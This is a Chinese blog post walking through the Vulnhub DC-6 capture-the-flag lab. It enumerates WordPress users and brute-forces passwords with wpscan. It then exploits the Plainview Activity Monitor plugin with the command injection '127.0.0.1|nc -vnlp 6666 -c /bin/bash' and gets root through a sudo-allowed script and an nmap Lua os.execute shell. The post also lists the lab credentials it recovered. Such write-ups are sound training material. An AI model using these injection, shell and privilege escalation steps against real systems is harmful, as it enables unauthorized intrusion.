Vulnhub-DC-6

最新推荐文章于 2024-03-14 02:19:26 发布
最新推荐文章于 2024-03-14 02:19:26 发布
阅读量174 收藏
点赞数
分类专栏: Vulnhub
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107120623
版权

这是一个利用wordpress插件漏洞提权的一个靶场,感觉还行叭,前面作者也在题目中给足了思路,要用到rockyou字典,一看是wordpress,思路就是拿到该站点用 wpscan 得到用户名,然后再用 wpscan 配合字典得到密码,后面提权视具体情况而定

nmap -sn 192.168.67.99:获取到目标地址 192.168.67.99
nmap -A -p- 192.168.67.99:获取到目标地址系统信息及开放端口信息 22 80
既然给了 22 端口那么极有可能会用到…

浏览器查看下http://192.168.67.99发现登陆不上去,页面会跳转到http://wordy,于是修改一下到 /etc/hosts 增添一条规则,将 192.168.67.99 解析到 http://wordy
1592901060(1).png
再次打开 http://wordy 查看,这界面一看就是 wordpress 老规矩,wapplayzer 查看一下,是 wordpress 5.1.1 版本[新版本],根据题目提示[刚开始没有看到提示,直接 cewl 收集了一波,然后 wpscan 查了下用户名,rockyou 字典有点大…跑起来很费时]

一边跑下有哪些有户名,一边把字典搞过来
wpscan --url http://wordy -e u
cp /usr/share/wordlists/rockyou.txt.gz /root/ --> 解压,得到 rockyou.txt
cat rockyou.txt | grep k01 > pwd.txt

得到五个用户名:admin mark graham sarah jens,保存到 name.txt
wpscan 跑密码: wpscan --url http://wordy -U name.txt -P pwd.txt
得到 mark 的密码: helpdesk01
尝试 ssh 登陆,登陆失败
于是 web 登陆,也没看到有什么东西可搞,wordpress 最常爆漏洞的地方就是插件了,那就枚举一下该站都有哪些插件

wpscan --url http://wordy --plugins-detection aggressive

发现有两个插件不是最新版本的,看看这两个插件有无可利用的
searchsploit Plugin Plainview Activity
WordPress Plugin Plainview Activity Monitor 20161228 - (Auth | php/webapps/45274.html
cp /usr/share/exploitdb/exploit/php/webapps/45274.html /root/a.html
vim a.html修改
cp a.html /var/www/html/
service apache2 start
kali这边:nc 192.168.67.99 9999
1592903183(1).png

访问 http://192.168.67.221/a.html,点击 submit request 提交,页面跳转,但是没有反应,提示 connection refused

那就尝试提交一下
710cd7f88be0f50a35d682c7bd86b49.png
dbcc36e7d57efce87cccbbf8514793b.png
可看到命令正常执行,F12 修改一下max length,把 15 改成 1000,然后输入
127.0.0.1|nc -vnlp 6666 -c /bin/bash
nc 192.168.67.99 6666 --> kali这边接shell

成功拿到 shell,加个壳
python -c 'import pty;pty.spawn("/bin/bash")'
cd /home/mark
ls
cd stuff
cat things-to-do.txt

得到 graham 的密码:
- Add new user: graham - GSo7isUM1D4 - done

ssh 登陆一波:
ssh graham@192.168.67.99
yes
GSo7isUM1D4

ls --> 没有东西
sudo -l --> 查看有无过权东西
有:/home/jens/backups.sh

既然该 shell 脚本可以以 jens 权限,那就写点东西进去,
cat /home/jens/backups.sh
vi /home/jens/backups.sh
#!/bin/bash
/bin/bash
cat /home/jens/backups.sh
cd /home/jens
sudo -u jens ./backups.sh

这就来到了 jens 的环节:
ls
sudo -l:发现有 /usr/bin/nmap
众所周知 nmap 可以启用脚本:那执行个系统命令岂不可以拿到 root 权限?
echo 'os.execute("/bin/bash")' > SHELL -->注意引号的使用
sudo /usr/bin/nmap --script SHELL
id
ls /root/
cat /root/the/flag.txt

1592904898(1).png

总结:
1.密码破解2.漏洞利用3.提权4.细心5.简单脚本

CrAcKeR-1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
lemonsqueezy1
m0_46580995的博客
10-02 479
目录爆破发现时wordpress wpscan 两个用户通过rockyou爆破密码 得到orange ginger 登录wordpress 找到密码登录phpmyadmin 创建用户写入后门 反弹shell 上传枚举脚本 /etc/logrotate.d/logrotate可写并以cronjob运行 msfvenom生成shell写入 等待反弹 ...
Vulnhub靶机实战——DC-6
冠霖L的博客
10-28 3879
靶机DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 15虚拟机软件 DC-6靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.142 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.142...
Vulnhub靶机 DC-6
菜浪马废的博客
03-30 323
确定靶机192.168.0.141 开放端口80,查看一下 nmap -sP 192.168.0.0/24 nmap -sV 192.168.0.141 不能直接查看 vim /etc/hosts 添加一下 可以访问了,发现是wordpass,上wpscan 找到了五个用户名,把五个用户名写进一个txt文件,当作用户名字典 kali自带一个字典rockyou.txt wpscan --...
Vulnhub - DC-1
qq_46081990的博客
03-14 375
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
VulnHubDC-5
weixin_39219503的博客
02-01 643
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-5,314/ 题目信息如下,只有一个flag Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub-djinn3
KAKA的博客
07-18 1119
与 1 和 2 相同,开机即可得到 djinn3 的 IP地址:192.168.67.14 获取相关信息:nmap -A -p- 192.168.67.14 22 ---> ssh --> open 80 ---> http --> open 5000 ---> http --> open 31337 ---> open --> open 探测 80 端口 先看看刚刚 nmap 有没有扫出什么东西: 可得到服务端是 lighttp.
Vulnhub-DC-1
KAKA的博客
06-04 891
配置信息: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 (VirtualBox) IP:192.168.67.200 攻机:Kali (Local) IP:192.168.67.109 目标:获取5个flag 开始游戏: 扫描整个网段获取目标IP地址: nmap -sn 192.168.67.0/24 获取目标IP地址:192.168.67.200 扫描目标信息: nmap-A -p-1...
Vulnhub-Basilic
KAKA的博客
07-10 567
灰常有意思的一次训练,需要对 python 沙箱逃逸有一定程度的理解,让我们开始游戏吧~ [注:从源地址下载出得知需要拿到 4 个 flag] 利用 namp 扫描获取目标 IP 地址:nmap -sn 192.168.67.1/24 继续获取目标的相关开放端口等信息:namp -A -p- 192.168.67.18 可以看到下列信息: http服务对应的端口是 5000 ,而不是 80,其次还开放了 22 --> ssh 服务,我们登陆到 web 页面游玩下~ 点击 contact me,得到
Vulnhub-djinn2
KAKA的博客
07-15 508
欢迎来到 djinn2 的世界,首先我们得对企业环境些许了解,否则你将无法顺畅地做该练习,在企业中一般都会有备份和邮箱,所以在该练习中,要注意备份和邮箱,一般放置的目录为 /var 目录,除此之外,作者还给我们一个小提示,就是在 5000 端口服务中有 RCE 存在,我们需要利用它,除此之外,介绍一下 MSF 中的 web_delivery 模块,它用于在我们有一定的访问权限,但是没有 shell 的情况下,让咋们开始吧:D nmap -A -p- 192.168.67.33 共开放了 5 个端口,2
Vulnhub-DC-9
KAKA的博客
07-04 485
nmap 扫描获取目标 IP 地址 nmap 扫描目标 IP 地址获得开放端口: 这里仔细看下,可以看到 22 是 filtered,80 开放,22 是被过滤这就很奇怪,针对这个,首先你得看下这篇文章: 保护 SSH 的三把锁 不想看的看下边:(强推看下原文) 简单总结下就是:1.换端口 2.指定用户登入 3.敲门服务 这里重点说下敲门服务就是,你想打开 ssh 大门,打开大门方式是念咒语,你得先去打开其它几扇门才可以打开 SSH 服务,敲门服务必须安装敲门守护进程 knockd,敲门配置在 /etc
vulnhub-djinn1
KAKA的博客
07-14 443
获取 IP 地址,目标机器已显示: 获取信息:nmap -A -p- 192.168.67.108 得到 4 个端口: 21 --> FTP --> open --> 猜测有文件可获取 22 --> SSH --> filtered --> 猜测为敲门服务[DC 有练过] 1337 --> SOME --> open --> 使用 nc 连接 7331 --> HTTP --> open --> 网页 21 --> FTP
Vulnhub-DC-7
KAKA的博客
07-04 400
此次的训练以 Drupal 为主题,并且思考方式不再是单纯的在盒子里,而是要跳出去… 扫描整获取目标 IP :nmap -sn 192.168.67.0/24 扫描目标获取相应信息:nmap -A -p- 192.168.67.242 --> 22 | 80 22 SSH 服务 || 80 HTTP 服务,猜测后面极有可能要用到 SSH 服务…查阅 http://192.168.67.242,CMS 是 Drupal,版本为 8,没有找到关于该版本的相关漏洞利用 初步浏览页面,说是引入了新的概念,需要
Vulnhub-DC-8
KAKA的博客
07-04 355
首先用 namp 扫描,获取目标 IP 地址:nmap -sn 192.168.67.0/24 其次再用 nmap 扫描下目标端口:nmap -A -p- 192.168.67.52/24 看来开放了 80 和 22 端口,上去网页浏览下: 点开各个页面看看,可以发现有些 URL 地址栏会变,在这里补充个知识 Drupal 的 id 名称为 node id 简称 nid,这里因为显示 2 3 node 所以想着会不会有 SQL 注入: 尝试加个单引号,就会产生报错信息,这在 Sqlilabs 上面训
Vulnhub-DC-3
KAKA的博客
07-04 299
扫描获取目标 IP 地址:192.168.67.72 nmap -sn 192.168.67.0/24 扫描获取系统及开放端口:http nmap -A -p- 192.168.67.72 查看页面:http://192.168.67.72 得到flag: This time, there is only one flag, one entry point and no clues. To get the flag, you'll obviously have to gain root privileges
DC-DC电源模块工作原理详解
"DC-DC电源模块是一种将直流电转换为另一固定或可调直流电的设备,广泛应用在各种电子设备中。它的工作原理主要涉及高频开关、滤波、控制和储能等环节,以实现高效、小型化和稳定的电源供应。" DC-DC电源模块的核心...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值